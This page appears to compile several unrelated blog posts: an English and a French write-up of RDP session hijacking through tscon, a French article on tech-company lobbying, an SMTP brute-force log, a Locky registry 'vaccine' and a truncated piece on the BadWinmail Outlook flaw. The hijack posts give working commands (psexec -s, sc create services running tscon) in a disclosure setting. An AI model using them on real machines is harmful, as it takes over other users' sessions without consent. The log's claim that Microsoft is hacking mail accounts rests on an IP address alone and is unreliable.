Session Hijacking All Windows versions

0-day or Feature? Privilege Escalation / Session Hijacking All Windows versions

* This post periodically updated, all updates in the end of the post.

Hey there,

Blogpost in 20 seconds: Fun with sethc backdoored host 🙂 somewhere in the internet:

Recently i’ve played with sethc/utilman logon screen backdoors, and almost everytime i used just command line.
Occasionally i’ve looked at Users tab in Task Manager (taskmgr.exe), and clicked connect button, and surprisingly i’ve got connected to selected user’s session.

When i checked it again with local admin rights, it failed by asking user’s password.
Why and how that happened? Let’s dig deeper.

Related to Microsoft documentation:
https://technet.microsoft.com/en-us/library/cc770988(v=ws.11).aspx
https://technet.microsoft.com/en-us/library/cc731007(v=ws.11).aspx

we can see couple important remarks:

Remarks

  • You must have Full Control access permission or Connect special access permission to connect to another session.
  • The /dest:<SessionName> parameter allows you to connect the session of another user to a different session.
  • If you do not specify a password in the <Password> parameter, and the target session belongs to a user other than the current one, tscon fails (not really).

I’ve got it! Sticky Keys (cmd backdoor) at windows login screen runs with NT AUTHORITY/SYSTEM and have Full Control access permission, and can connect to EVERY user session without asking for a password.

So we’ve got a session hijacking here. The most funny thing is that the legit user isn’t asked for logout, by using this technique the user just will be kicked out of the session without any notification.

Vulnerability Details.

A privileged user, which can gain command execution with NT AUTHORITY/SYSTEM rights can hijack any currently logged in user’s session, without any knowledge about his credentials.
Terminal Services session can be either in connected or disconnected state.

This is high risk vulnerability which allows any local admin to hijack a session and get access to:
1. Domain admin session.
2. Any unsaved documents, that hijacked user works on.
3. Any other systems/applications in which hijacked user previously logged in (May include another Remote Desktop sessions, Network Share mappings, applications which require another credentials, E-mail etc.)

Example scenario:

Some bank employee have access to billing system, and it’s credentials to login.
One day, he come to work, logging in to the billing system and start to work. At lunch time he will lock his workstation, and out to lunch.
Then, system administrator gets to employee’s workstation, and logs in with his administrator’s account.
According to the bank’s policy, administrator’s account should not have access to the billing system, but with couple of built-in commands in windows, this system administrator will hijack employee’s desktop which he leaved locked. From now, sysadmin can perform malicious actions in billing system as billing employee account.

There are huge amount of scenarios like this.

Furthermore, an attacker doesn’t need to use tools like metasploit, incognito, mimikatz etc, which is commonly used for user’s token manipulation and impersonating logged in users. Everything is done with built-in commands. Every admin can impersonate any logged in user either locally with physical access or remotely via Remote Desktops (see PoC).

Feature Vulnerability tested on:

Windows 2012 R2
Windows 2008
Windows 10
Windows 7

Proof of Concept:

Microsoft documentation helps us to do that from command line:
All we need is NT AUTHORITY/SYSTEM command line.
Easiest method with psexec, but requires psexec.exe to be there:
psexec -s \\localhost cmd
Another method is to create a service that will connect selected session to ours.
1. Get all sessions information:
C:\Windows\system32>query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator                             1  Disc            1  3/12/2017 3:07 PM
>localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM

C:\Windows\system32>

2. Create service which will hijack user’s session:

C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
[SC] CreateService SUCCESS
3. Start service:
net setart sesshijack
Right after that your session will be replaced with target session.

Proof of Concept video:

Windows 7 via Task Manager:

https://youtu.be/oPk5off3yUg

Windows 7 via command line:

https://youtu.be/VytjV2kPwSg

Windows 2012 R2 via service creation:

https://youtu.be/OgsoIoWmhWw

Update:  has found that before in 2011, so that is a feature and not zero-day: http://blog.gentilkiwi.com/securite/vol-de-session-rdp

Update: If you still think that this don’t have high attack value, read a great writeup by Kevin Beaumont about this feature:
https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

Update: RedSnarf has now support in RDP Hijacking https://www.youtube.com/watch?v=VrF8uXK_ePY

Vol de session RDP

Quand le systùme à tous les droits, rien ne vas plus


Vous ĂȘtes administrateur d’un serveur (ou vous en avez les droits ;)) et aimeriez rĂ©cupĂ©rer une session RDP dĂ©jĂ  ouverte, mal fermĂ©, ou simplement aller voir pourquoi Paintbrush est ouvert sur un serveur ?

rdp_paint

Plusieurs options nous sont ouvertes :

  • Se connecter en RDP sur le serveur et rĂ©cupĂ©rer la session Ă  l’écran d’accueil :logon_screen_pwd

    mais il faudra connaütre le mot de passe de session pour continuer


  • Se connecter en RDP avec son compte administrateur (puis tenter une connexion par le gestionnaire de tĂąches par exemple)taskmgr_pwd

    mais il faudra connaütre le mot de passe de session pour continuer
 (idem via tscon ou le gestionnaire des services Bureau à distance)

  • L’assistance Ă  distance : par dĂ©faut, ce n’est pas automatiqueaide_distance

    il fallait rĂ©gler ces options avant, et elles n’agiront pas sur les sessions courantes 🙁

Demandons un coup de main au systĂšme ?

Le systĂšme est notre ami

tscon_service

  1. Récupérons les identifiants de sessions concernés : query session
    C:\Windows\system32>query session
     SESSION           UTILISATEUR              ID  ÉTAT    TYPE        PÉRIPHÉRIQUE
     services                                    0  Déco
     console                                     1  Conn
    >rdp-tcp#1         user1                     2  Actif   rdpwd
     rdp-tcp#0         gentilkiwi                3  Actif   rdpwd
     rdp-tcp                                 65536  Écouter

    rdp-tcp#0 est la session que nous voulons voler, rdp-tcp#1 est notre session ouverte.

  2. CrĂ©ons rapidement un faux service (qui fera l’affaire) :
    sc create givemerdp binpath= "cmd /k tscon rdp-tcp#0 /dest:rdp-tcp#1" type= own
  3. En le dĂ©marrant, le bureau basculera 🙂
    sc start  givemerdp

    Il peut ĂȘtre supprimĂ© par :

    sc delete givemerdp

Cela peut bien sur ĂȘtre plus propre avec PsExec
 (et son argument -s)

Tests que je vous invite Ă  effectuer :

  • Travailler avec des sessions RDP sources inactives ou dont la session Windows n’est pas fermĂ©e
  • Travailler avec des sessions RDP cibles pas encore connectĂ©s !
  • Utiliser PsExec depuis une invite externe (sans RDP)

 

Source: http://blog.gentilkiwi.com/securite/vol-de-session-rdp

L’influence tentaculaire des gĂ©ants amĂ©ricains

Des relations documentées en Europe

Protection des donnĂ©es personnelles, rĂ©glementation des VTC, scĂ©narios fiscaux : les lĂ©gislations europĂ©ennes et françaises peuvent avoir des effets importants sur les gĂ©ants technologiques amĂ©ricains et leurs profits. Pour s’Ă©viter des dĂ©convenues budgĂ©taires ou prĂ©parer la lĂ©gislation Ă  leurs prochaines innovations, ces gĂ©ants investissent dans le lobbying. PrĂšs de 13 millions d’euros sont dĂ©pensĂ©s en lobbying par Google, Microsoft, Facebok, Apple, Amazon, Twitter et Uber chaque annĂ©e au niveau europĂ©en. Google et Microsoft sont ceux qui annoncent des budgets annuels consacrĂ©s aux activitĂ©s de lobbying en Europe les plus importants, avec des dĂ©penses entre 4,25 millions d’euros et 4,5 millions d’euros chaque annĂ©e.

Lobbying en Europe

Les rencontres des commissaires

Les commissaires europĂ©ens sont tenus de consigner toutes les rencontres qu’ils font avec les lobbyistes enregistrĂ©s auprĂšs du Parlement europĂ©en. Ces rencontres sont compilĂ©es par Transparency International. Elles permettent de voir comment et auprĂšs de qui les entreprises agissent. Avec Microsoft, Google est l’entreprise dont la prĂ©sence est la plus importante auprĂšs des institutions europĂ©ennes. Ce sont Ă©galement ses lobbyistes qui rencontrent le plus les commissaires europĂ©ens ou leur cabinet.

Notre compilation ne prend pas cependant pas en compte les associations auxquelles participent ces entreprises. Sorte de super-lobby, elles reprĂ©sentent les intĂ©rĂȘts de plusieurs entreprises et sont richement dotĂ©es. Il existe par exemple Digital Europe, qui reprĂ©sente les entreprises du numĂ©rique ou la CCIA (Computers & communication industry association), qui comptabilise 34 rencontres en son nom propre depuis 2014 avec des commissaires.

Google et Microsoft

40% des rencontres sont avec les commissaires responsables du marchĂ© unique numĂ©rique et de l’Ă©conomie numĂ©rique. Mais chez Google et Microsoft, on visite tout le monde. L’Ă©ducation, le travail, la recherche… Microsoft rencontre ainsi le cabinet du commissaire aux affaires intĂ©rieures pour discuter de « l’utilisation des nouvelles technologies en termes de sĂ©curitĂ© et de la crise migratoire ». L’entreprise n’a pas rĂ©pondu Ă  nos demandes de prĂ©cisions sur cette rencontre ou les nouvelles technologies qu’elle peut proposer dans ce contexte. Et les rencontres sont parfois plus rapprochĂ©es : une Ă©tude publiĂ©e en juin montrait que Google avait embauchĂ© prĂšs de 70 fonctionnaires europĂ©ens pour faire son lobbying.

Google a dramatiquement augmentĂ© le nombre de ses embauches « portes tambour » aprĂšs 2011, lorsque la Commission europĂ©enne a lancĂ© sa premiĂšre enquĂȘte antitrust contre l’entreprise. 18 de ses embauches ont Ă©tĂ© faites en 2011, soit plus du double de l’annĂ©e prĂ©cĂ©dente.

Un manque de transparence en France

Les lois concernant le lobbying sont quasiment inexistantes en France. Personne ne rĂ©pertorie les rencontres entre ceux qui Ă©crivent les lois et les lobbyistes. Parcellairement, nous avons reconstituĂ© quelques rencontres entre le pouvoir exĂ©cutif et les gĂ©ants amĂ©ricains. Depuis le dĂ©but du quinquennat, nous avons pu identifier 68 rencontres, dont un tiers sont entre Google et l’exĂ©cutif français. Les rencontres les plus mĂ©diatisĂ©es sont celles qui donnent une conclusion souriante Ă  des heures de lobbying : la signature d’un contrat entre le ministĂšre de l’Éducation nationale et Microsoft en 2015 ou l’accord entre Google et la presse française, signĂ© en grande pompe Ă  l’ÉlysĂ©e en fĂ©vrier 2013.

Lobbying en France

Portes tambour

Ce lobbying discret peut compter sur l’appui de certains serviteurs de l’État partis travailler pour Uber, Google ou Twitter : c’est ce qu’on appelle les portes tambour. Le dernier en date, annoncĂ© le 14 janvier, concerne BenoĂźt Loutrel, directeur gĂ©nĂ©ral de l’Arcep, le rĂ©gulateur des tĂ©lĂ©coms, qui rejoint l’Ă©quipe de lobbying de Google. Nous avons analysĂ© le parcours – principalement grĂące Ă  LinkedIn, propriĂ©tĂ© de Microsoft – d’une vingtaine de personnes passĂ©es du public Ă  ces entreprises. Ainsi, en 2015, Uber a recrutĂ© l’ancien conseiller en communication du secrĂ©taire d’État aux transports, quand Facebook peut compter sur un ancien conseiller de Nicolas Sarkozy Ă  l’ÉlysĂ©e.

Ces transferts ne sont presque pas encadrĂ©s et quasiment toujours acceptĂ©s. Un encadrement et une transparence sur les critĂšres permettraient de s’assurer que l’employĂ© ne tire pas profit de son temps dans le public. Les Ă©changes en « portes-tambour » peuvent encourager les Ă©changes de bons procĂ©dĂ©s entre les grandes entreprises et le secteur public.

Les liens de Microsoft

Depuis 2012, Microsoft a signé plusieurs des contrats et conventions.

Microsoft est la seule entreprise parmi celles Ă©tudiĂ©es Ă  avoir reçu des subventions au niveau europĂ©en et Ă  ĂȘtre bĂ©nĂ©ficiaire de marchĂ©s publics, pour un montant de 23 millions d’euros.

Des progrĂšs Ă  faire

Concernant les rencontres avec les dirigeants et les lobbyistes, Axelle Lemaire, secrĂ©taire d’État au numĂ©rique, publiait jusqu’Ă  la moitiĂ© de l’annĂ©e 2016 son agenda en ligne dans un format lisible. Cette bonne habitude, qui permettait de facilement suivre son travail s’est hĂ©las arrĂȘtĂ©e. Elle se contente aujourd’hui du format PDF inexploitable. Il a fallu Ă©plucher de nombreux pdf d’agenda, pas forcĂ©ment tous conservĂ©s, pour retrouver l’agenda de chaque ministre depuis le dĂ©but du quinquennat. Quant aux parlementaires, rien ne permet de suivre leurs rendez-vous. La loi Sapin 2, relative Ă  la transparence et Ă  la lutte contre la corruption, votĂ©e Ă  l’Ă©tĂ© 2016 ne prĂ©voit qu’un registre des lobbyistes. Des modalitĂ©s bien pauvres, si l’on compare avec les Etats-Unis et le Canada. Cette transparence permettrait pourtant de comprendre plus facilement les intĂ©rĂȘts de chacun dans les lĂ©gislations en discussion.

source: https://github.com/alphoenix/donnees/tree/master/lobbies-gafamut#des-relations-documentées-en-europe

Microsoft tente de pirater des comptes mails.

Quelqu’un chez Microsoft tente de pirater des comptes mails.

Fri 2016-09-02 09:42:47.165: 05: Session 995785; child 0001
Fri 2016-09-02 09:42:47.165: 05: Accepting SMTP connection from 104.41.137.35:56636 to **.**.**.**:25
Fri 2016-09-02 09:42:47.183: 03: –> 220-******** ESMTP; Fri, 02 Sep 2016 09:42:47 +0200
Fri 2016-09-02 09:42:47.183: 03: –> 220-****************************************
Fri 2016-09-02 09:42:47.183: 03: –> 220-* Spammers will be blocked for ever           *
Fri 2016-09-02 09:42:47.183: 03: –> 220-* We block spammers by whole IP scopes  *
Fri 2016-09-02 09:42:47.183: 03: –> 220-* Any attemps to hack locks the ip forever *
Fri 2016-09-02 09:42:47.183: 03: –> 220-****************************************
Fri 2016-09-02 09:42:47.266: 02: <– EHLO WS12R2Std01
Fri 2016-09-02 09:42:47.268: 03: –> 250-****.info Hello WS12R2Std01, pleased to meet you
Fri 2016-09-02 09:42:47.268: 03: –> 250-ETRN
Fri 2016-09-02 09:42:47.268: 03: –> 250-AUTH LOGIN CRAM-MD5 PLAIN
Fri 2016-09-02 09:42:47.268: 03: –> 250-8BITMIME
Fri 2016-09-02 09:42:47.268: 03: –> 250-ENHANCEDSTATUSCODES
Fri 2016-09-02 09:42:47.268: 03: –> 250-STARTTLS
Fri 2016-09-02 09:42:47.450: 04: Failed SMTP authentication attempt from 104.41.137.35 for “info@****.***”
Fri 2016-09-02 09:42:47.450: 03: –> 535 5.7.8 Authentication failed
Fri 2016-09-02 09:42:47.532: 02: <– AUTH PLAIN ******
Fri 2016-09-02 09:42:47.533: 04: Failed SMTP authentication attempt from 104.41.137.35 for “info@****.***”
Fri 2016-09-02 09:42:47.533: 03: –> 535 5.7.8 Authentication failed
Fri 2016-09-02 09:42:47.537: 04: SMTP session terminated (Bytes in/out: 148/870)

Il y a eu 151 tentatives. Bravo #Microsoft:

Fri 2016-09-02 10:23:53.361: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:23:53.692: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:23:53.693: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:08.790: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:08.976: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:09.151: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:09.322: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:09.495: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:09.669: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:09.854: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:10.029: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:10.373: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:10.374: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:25.466: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:25.640: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:25.815: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:25.999: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:26.173: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:26.357: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:26.532: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:26.704: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:26.964: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:26.965: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:42.064: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:42.234: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:42.407: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:42.581: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:42.752: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:42.922: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:43.094: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:43.266: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:43.503: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:43.504: Dynamic screening refused 104.41.137.35; 439 minutes remain
Fri 2016-09-02 10:24:58.615: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:24:58.791: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:24:58.962: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:24:59.135: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:24:59.305: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:24:59.480: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:24:59.670: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:24:59.870: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:00.124: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:00.125: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:15.286: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:15.461: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:15.647: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:15.820: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:16.004: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:16.177: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:16.349: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:16.540: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:16.796: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:16.797: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:31.896: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:32.072: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:32.261: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:32.447: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:32.636: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:32.819: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:33.005: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:33.181: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:33.432: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:33.433: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:48.709: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:48.881: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:49.072: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:49.258: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:49.447: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:49.631: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:49.816: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:49.995: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:50.249: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:25:50.249: Dynamic screening refused 104.41.137.35; 438 minutes remain
Fri 2016-09-02 10:26:05.359: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:05.531: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:05.702: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:05.874: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:06.051: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:06.233: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:06.407: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:06.580: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:06.835: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:06.835: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:21.923: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:22.102: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:22.284: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:22.460: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:22.643: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:22.815: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:22.988: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:23.159: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:23.623: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:23.624: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:38.730: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:38.915: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:39.090: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:39.279: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:39.465: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:39.639: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:39.824: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:39.995: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:40.367: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:40.369: Dynamic screening refused 104.41.137.35; 437 minutes remain
Fri 2016-09-02 10:26:55.470: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:55.641: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:55.817: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:56.002: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:56.175: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:56.346: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:56.518: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:56.690: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:56.955: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:26:56.956: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:12.114: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:12.294: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:12.476: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:12.665: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:12.835: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:13.008: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:13.181: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:13.352: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:13.627: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:13.628: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:28.754: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:28.939: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:29.110: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:29.281: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:29.454: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:29.627: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:29.796: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:29.969: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:30.255: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:30.255: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:45.361: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:45.536: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:45.719: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:45.894: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:46.097: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:46.288: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:46.490: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:46.673: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:46.968: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:27:46.969: Dynamic screening refused 104.41.137.35; 436 minutes remain
Fri 2016-09-02 10:28:02.203: Dynamic screening refused 104.41.137.35; 435 minutes remain
Fri 2016-09-02 10:28:02.374: Dynamic screening refused 104.41.137.35; 435 minutes remain
Fri 2016-09-02 10:28:02.561: Dynamic screening refused 104.41.137.35; 435 minutes remain
Fri 2016-09-02 10:28:02.736: Dynamic screening refused 104.41.137.35; 435 minutes remain
Fri 2016-09-02 10:28:02.922: Dynamic screening refused 104.41.137.35; 435 minutes remain
Fri 2016-09-02 10:28:03.095: Dynamic screening refused 104.41.137.35; 435 minutes remain
Fri 2016-09-02 10:28:03.268: Dynamic screening refused 104.41.137.35; 435 minutes remain
Fri 2016-09-02 10:28:03.453: Dynamic screening refused 104.41.137.35; 435 minutes remain

Locky – La solution pour s’en protĂ©ger

First seen on: http://korben.info/locky-solution-sen-proteger.html

La plus rapide Ă©tant de passer tout son OS en Russe pour le vacciner, je vais plutĂŽt vous rĂ©sumer la seconde solution, Ă  la fois rapide et pratique quand on ne parle pas un mot de Poutinien. Attention, elle sera efficace uniquement avec les versions actuelles de Locky. Rien ne garantit qu’une version ultĂ©rieure de Locky ne contournera pas le souci.

Comme Locky essaye de crĂ©er la clĂ© HKCU\Software\Locky dans la base de registre (regedit), il suffit de la crĂ©er avant lui…

Capture d’écran 2016-03-23 Ă  15.37.19

et de refuser tous les droits d’accĂšs sur celle-ci:

Capture d’écran 2016-03-23 Ă  15.38.22

Et voilà ! Ainsi, en se lançant sur votre systÚme, Locky se crashera comme une station Mir dans le jardin de Paco. Les autres solutions proposées par Lexsi sont un poil plus complexes, mais vraiment intéressantes. Je vous invite à les lire, ne serait-ce que pour votre culture personnelle.

Merci Ă  Olivier pour le partage.

Comment votre PC peut ĂȘtre infectĂ© par un seul e-mail non lu ?

Comment votre PC peut ĂȘtre infectĂ© par un seul e-mail non lu ?

Nous vous le rĂ©pĂ©tons sans cesse : ne cliquez jamais sur des liens suspicieux, n’ouvrez jamais de fichiers de sources inconnues et effacez toujours les e-mails d’expĂ©diteurs que vous ne con-naissez pas. MĂȘme si tous ces conseils sont bons, ils ne vous serviront Ă  rien si vous utilisez Outlook, car ils ne vous protĂ©geront pas de la vulnĂ©rabilitĂ© BadWinmail. Vous n’avez pas besoin de cliquer ou d’ouvrir quelque chose d’infectĂ©. Vous recevez un e-mail
 et c’est tout. En fait, il n’est mĂȘme pas nĂ©cessaire d’ouvrir le mail.

badwinmail-featured

Comment est-ce possible ?

Si vous connaissez Microsoft Office, vous savez probablement que des objets peuvent ĂȘtre in-tĂ©grĂ©s Ă  des fichiers MS Office. Bien sĂ»r, ce n’est pas le cas de n’importe quel objet, mais la liste est assez longue. Cela s’appelle la technologie OLE (Object Linking and Embedding, incrustation et connexion d’objet).

En fait, cette technologie fonctionne non seulement sur DOC, XLS et cetera, mais aussi sur Ou-tlook. Et la liste des objets mentionnés ci-dessous contient, en plus de formats MS Office géné-riques, des choses sympas comme les projets Adobe Flash.

